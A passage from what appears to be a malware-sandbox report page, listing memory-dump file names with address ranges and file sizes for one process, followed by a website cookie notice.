                                    Filesize

                                    128KB

                                  • memory/3952-37-0x0000000005BA0000-0x0000000005BDC000-memory.dmp

                                    Filesize

                                    240KB

                                  • memory/3952-36-0x0000000004EA0000-0x0000000004EB2000-memory.dmp

                                    Filesize

                                    72KB

                                  • memory/3952-35-0x0000000004990000-0x00000000049F6000-memory.dmp

                                    Filesize

                                    408KB

                                  • memory/3952-34-0x0000000004A50000-0x0000000004AE2000-memory.dmp

                                    Filesize

                                    584KB

                                  • memory/3952-33-0x0000000004ED0000-0x0000000005474000-memory.dmp

                                    Filesize

                                    5.6MB

                                  • memory/3952-32-0x0000000000020000-0x000000000007E000-memory.dmp

                                    Filesize

                                    376KB

                                  • memory/3952-29-0x00000000730EE000-0x00000000730EF000-memory.dmp

                                    Filesize

                                    4KB

                                  We care about your privacy.

                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.